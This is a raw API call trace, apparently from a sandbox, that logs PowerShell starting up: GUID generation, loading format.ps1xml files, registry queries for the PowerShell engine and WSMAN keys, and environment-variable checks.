	[0594.551] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x53b73d91, Data2=0x1d8d, Data3=0x4edd, Data4=([0]=0x94, [1]=0x3d, [2]=0xa2, [3]=0xed, [4]=0xeb, [5]=0x3c, [6]=0xe8, [7]=0x1e))) returned 0x0
	[0594.551] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xce427e54, Data2=0x3891, Data3=0x4876, Data4=([0]=0xbb, [1]=0x42, [2]=0xcc, [3]=0x15, [4]=0xa5, [5]=0xf1, [6]=0x22, [7]=0xac))) returned 0x0
	[0594.552] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xba1ada0f, Data2=0xa391, Data3=0x4d14, Data4=([0]=0x91, [1]=0xc6, [2]=0x73, [3]=0xbf, [4]=0xc5, [5]=0xdb, [6]=0x55, [7]=0x3))) returned 0x0
	[0594.552] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x50dce47, Data2=0xcbb4, Data3=0x4e7d, Data4=([0]=0xb8, [1]=0x26, [2]=0xc9, [3]=0xbb, [4]=0x89, [5]=0xb0, [6]=0x17, [7]=0x84))) returned 0x0
	[0594.552] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9fffc7ae, Data2=0xaef7, Data3=0x41cf, Data4=([0]=0xbb, [1]=0xc4, [2]=0x38, [3]=0x2b, [4]=0x9a, [5]=0x6c, [6]=0x65, [7]=0xdf))) returned 0x0
	[0594.552] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xe984684d, Data2=0x2f06, Data3=0x49c2, Data4=([0]=0x8f, [1]=0xa4, [2]=0x3b, [3]=0xf1, [4]=0x22, [5]=0x1c, [6]=0x7c, [7]=0x90))) returned 0x0
	[0594.552] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xbf14a589, Data2=0xd5d6, Data3=0x4ae3, Data4=([0]=0x93, [1]=0xdf, [2]=0xd9, [3]=0x8e, [4]=0x98, [5]=0xaa, [6]=0x93, [7]=0x32))) returned 0x0
	[0594.552] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x1e71d1ad, Data2=0xac88, Data3=0x44a4, Data4=([0]=0x9f, [1]=0xd1, [2]=0xb8, [3]=0xdf, [4]=0x1f, [5]=0x14, [6]=0x36, [7]=0xc9))) returned 0x0
	[0594.553] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x22f95331, Data2=0x544c, Data3=0x46dd, Data4=([0]=0x90, [1]=0xed, [2]=0x3b, [3]=0x8a, [4]=0x22, [5]=0x83, [6]=0x4, [7]=0xb0))) returned 0x0
	[0594.553] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc5c12421, Data2=0x8661, Data3=0x4826, Data4=([0]=0xad, [1]=0xca, [2]=0x2b, [3]=0x51, [4]=0xb3, [5]=0x69, [6]=0xa4, [7]=0x16))) returned 0x0
	[0594.553] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x2bab500f, Data2=0x355, Data3=0x4df9, Data4=([0]=0xb4, [1]=0x69, [2]=0x94, [3]=0x3f, [4]=0x2b, [5]=0x82, [6]=0x20, [7]=0x49))) returned 0x0
	[0594.553] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd9f5e1b, Data2=0xc9b8, Data3=0x41d6, Data4=([0]=0x9e, [1]=0x3f, [2]=0x7f, [3]=0xe2, [4]=0x75, [5]=0xe0, [6]=0xcd, [7]=0xa5))) returned 0x0
	[0594.559] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc37969dc, Data2=0xcc6, Data3=0x49f8, Data4=([0]=0x9e, [1]=0xfa, [2]=0xb1, [3]=0xb8, [4]=0x51, [5]=0xc1, [6]=0x85, [7]=0xf8))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x2451a876, Data2=0x5fbd, Data3=0x41d3, Data4=([0]=0x94, [1]=0x64, [2]=0x51, [3]=0x5f, [4]=0x61, [5]=0x81, [6]=0x8d, [7]=0x93))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x50b66bb7, Data2=0xb80b, Data3=0x4704, Data4=([0]=0xab, [1]=0xe1, [2]=0xcf, [3]=0xe3, [4]=0xfc, [5]=0xf5, [6]=0xb1, [7]=0x8b))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xcc0d78e8, Data2=0xaf95, Data3=0x4f41, Data4=([0]=0x9a, [1]=0xe2, [2]=0xc1, [3]=0x46, [4]=0x15, [5]=0x5d, [6]=0x3d, [7]=0xcf))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x6777aeea, Data2=0x2dc5, Data3=0x4042, Data4=([0]=0x8f, [1]=0x4c, [2]=0x45, [3]=0xf3, [4]=0x90, [5]=0x2a, [6]=0x96, [7]=0xaa))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x1ec6ac29, Data2=0xbac0, Data3=0x4e12, Data4=([0]=0x8c, [1]=0xf8, [2]=0xf2, [3]=0x3d, [4]=0x52, [5]=0x63, [6]=0x57, [7]=0x20))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb8b84b1c, Data2=0xa43, Data3=0x4532, Data4=([0]=0x8d, [1]=0x1e, [2]=0x80, [3]=0x62, [4]=0x42, [5]=0x1e, [6]=0x76, [7]=0xd4))) returned 0x0
	[0594.560] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd0ef64bb, Data2=0x9de4, Data3=0x4d82, Data4=([0]=0x92, [1]=0x29, [2]=0x30, [3]=0x46, [4]=0x8f, [5]=0x3c, [6]=0xca, [7]=0x40))) returned 0x0
	[0594.561] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x46e05ea3, Data2=0xc97c, Data3=0x4079, Data4=([0]=0xa6, [1]=0xd8, [2]=0x66, [3]=0x69, [4]=0x31, [5]=0x36, [6]=0x99, [7]=0x5e))) returned 0x0
	[0594.561] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xed47eb74, Data2=0x29a9, Data3=0x4192, Data4=([0]=0x9f, [1]=0xb1, [2]=0x77, [3]=0x4b, [4]=0x12, [5]=0x78, [6]=0xe5, [7]=0x10))) returned 0x0
	[0594.561] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd629c225, Data2=0x18a9, Data3=0x4093, Data4=([0]=0x94, [1]=0xa6, [2]=0x9d, [3]=0xb4, [4]=0x96, [5]=0x6a, [6]=0x6c, [7]=0xd5))) returned 0x0
	[0594.561] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x3c51907e, Data2=0x9438, Data3=0x4cda, Data4=([0]=0xac, [1]=0x4, [2]=0x72, [3]=0xba, [4]=0xe, [5]=0xf0, [6]=0x4c, [7]=0x4c))) returned 0x0
	[0594.561] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x347c4e15, Data2=0xb466, Data3=0x4802, Data4=([0]=0xbf, [1]=0x9d, [2]=0xd4, [3]=0x88, [4]=0xbf, [5]=0x12, [6]=0xd1, [7]=0x14))) returned 0x0
	[0594.561] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4e5ad812, Data2=0x9755, Data3=0x426a, Data4=([0]=0x87, [1]=0x29, [2]=0x82, [3]=0x74, [4]=0xa0, [5]=0x1b, [6]=0x4a, [7]=0xd0))) returned 0x0
	[0594.563] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd44a1c6c, Data2=0x578, Data3=0x4616, Data4=([0]=0xa6, [1]=0xd9, [2]=0x6a, [3]=0xda, [4]=0xa2, [5]=0xd9, [6]=0xb6, [7]=0xa0))) returned 0x0
	[0594.563] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0594.564] GetFileType (hFile=0x330) returned 0x1
	[0594.564] SetErrorMode (uMode=0x1) returned 0x1
	[0594.564] GetFileType (hFile=0x330) returned 0x1
	[0594.564] ReadFile (in: hFile=0x330, lpBuffer=0x362c798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362c798*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.564] ReadFile (in: hFile=0x330, lpBuffer=0x362c798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362c798*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.564] ReadFile (in: hFile=0x330, lpBuffer=0x362c798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362c798*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.564] ReadFile (in: hFile=0x330, lpBuffer=0x362c798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362c798*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.564] ReadFile (in: hFile=0x330, lpBuffer=0x362c798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362c798*, lpNumberOfBytesRead=0xcd138*=0x8b4, lpOverlapped=0x0) returned 1
	[0594.564] ReadFile (in: hFile=0x330, lpBuffer=0x362bbb4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362bbb4*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0594.565] ReadFile (in: hFile=0x330, lpBuffer=0x362c798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x362c798*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0594.565] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0594.565] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0594.565] CoTaskMemAlloc (cb=0x5a) returned 0x345800
	[0594.565] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x345800, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0594.565] CoTaskMemFree (pv=0x345800) 
	[0594.565] RegCloseKey (hKey=0x330) returned 0x0
	[0594.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0594.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0594.566] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xe6da42e2, Data2=0x1909, Data3=0x4557, Data4=([0]=0x96, [1]=0x0, [2]=0xa8, [3]=0xd8, [4]=0x88, [5]=0x6b, [6]=0x6c, [7]=0xdc))) returned 0x0
	[0594.566] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x396960db, Data2=0xb6eb, Data3=0x40b5, Data4=([0]=0x80, [1]=0x9d, [2]=0xd4, [3]=0x63, [4]=0xf2, [5]=0x61, [6]=0xb3, [7]=0xe5))) returned 0x0
	[0594.566] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0594.566] GetFileType (hFile=0x330) returned 0x1
	[0594.566] SetErrorMode (uMode=0x1) returned 0x1
	[0594.566] GetFileType (hFile=0x330) returned 0x1
	[0594.566] ReadFile (in: hFile=0x330, lpBuffer=0x366a580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x366a580*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.567] ReadFile (in: hFile=0x330, lpBuffer=0x366a580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x366a580*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.567] ReadFile (in: hFile=0x330, lpBuffer=0x366a580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x366a580*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.567] ReadFile (in: hFile=0x330, lpBuffer=0x366a580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x366a580*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0594.575] ReadFile (in: hFile=0x330, lpBuffer=0x366a580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x366a580*, lpNumberOfBytesRead=0xcd138*=0xe98, lpOverlapped=0x0) returned 1
	[0594.576] ReadFile (in: hFile=0x330, lpBuffer=0x3669b80, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3669b80*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0594.576] ReadFile (in: hFile=0x330, lpBuffer=0x366a580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x366a580*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0594.576] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0594.576] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0594.576] CoTaskMemAlloc (cb=0x5a) returned 0x345800
	[0594.576] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x345800, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0594.576] CoTaskMemFree (pv=0x345800) 
	[0594.577] RegCloseKey (hKey=0x330) returned 0x0
	[0594.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0594.577] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd224d2a4, Data2=0x6d90, Data3=0x4974, Data4=([0]=0xa9, [1]=0x38, [2]=0xb2, [3]=0x18, [4]=0xc4, [5]=0x6f, [6]=0x85, [7]=0x75))) returned 0x0
	[0594.577] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc4d8abcf, Data2=0x6d33, Data3=0x44ca, Data4=([0]=0x80, [1]=0x35, [2]=0x8c, [3]=0xbe, [4]=0xbf, [5]=0x7a, [6]=0x37, [7]=0x3c))) returned 0x0
	[0594.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0594.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0595.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0595.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0595.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0595.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0595.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0595.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0596.537] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.537] CoTaskMemFree (pv=0x291700) 
	[0596.539] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.539] CoTaskMemFree (pv=0x291700) 
	[0596.540] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.540] CoTaskMemFree (pv=0x291700) 
	[0596.542] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.542] CoTaskMemFree (pv=0x291700) 
	[0596.553] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.554] CoTaskMemFree (pv=0x291700) 
	[0596.559] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.559] CoTaskMemFree (pv=0x291700) 
	[0596.561] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0596.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.561] CoTaskMemFree (pv=0x291700) 
	[0596.565] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3d8 | out: phkResult=0xcd3d8*=0x330) returned 0x0
	[0596.566] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd2dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd2d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd2dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd2d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.567] CoTaskMemFree (pv=0x0) 
	[0596.567] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0596.567] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x34fcd0, lpcchValueName=0xcd388, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd388, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0596.567] CoTaskMemFree (pv=0x34fcd0) 
	[0596.567] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0596.567] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x34fcd0, lpcchValueName=0xcd388, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd388, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0596.567] CoTaskMemFree (pv=0x34fcd0) 
	[0596.567] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0596.567] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x34fcd0, lpcchValueName=0xcd388, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd388, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0596.567] CoTaskMemFree (pv=0x34fcd0) 
	[0596.568] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd36c, lpData=0x0, lpcbData=0xcd368*=0x0 | out: lpType=0xcd36c*=0x1, lpData=0x0, lpcbData=0xcd368*=0x8) returned 0x0
	[0596.568] CoTaskMemAlloc (cb=0xc) returned 0x3483c0
	[0596.568] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd33c, lpData=0x3483c0, lpcbData=0xcd338*=0x8 | out: lpType=0xcd33c*=0x1, lpData="2.0", lpcbData=0xcd338*=0x8) returned 0x0
	[0596.568] CoTaskMemFree (pv=0x3483c0) 
	[0598.786] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd328 | out: phkResult=0xcd328*=0x330) returned 0x0
	[0598.786] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd22c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd228, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd22c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd228*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.786] CoTaskMemFree (pv=0x0) 
	[0598.786] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0598.786] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x34fcd0, lpcchValueName=0xcd2d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd2d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0598.787] CoTaskMemFree (pv=0x34fcd0) 
	[0598.787] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0598.787] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x34fcd0, lpcchValueName=0xcd2d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd2d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0598.787] CoTaskMemFree (pv=0x34fcd0) 
	[0598.787] CoTaskMemAlloc (cb=0x204) returned 0x34fcd0
	[0598.787] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x34fcd0, lpcchValueName=0xcd2d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd2d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
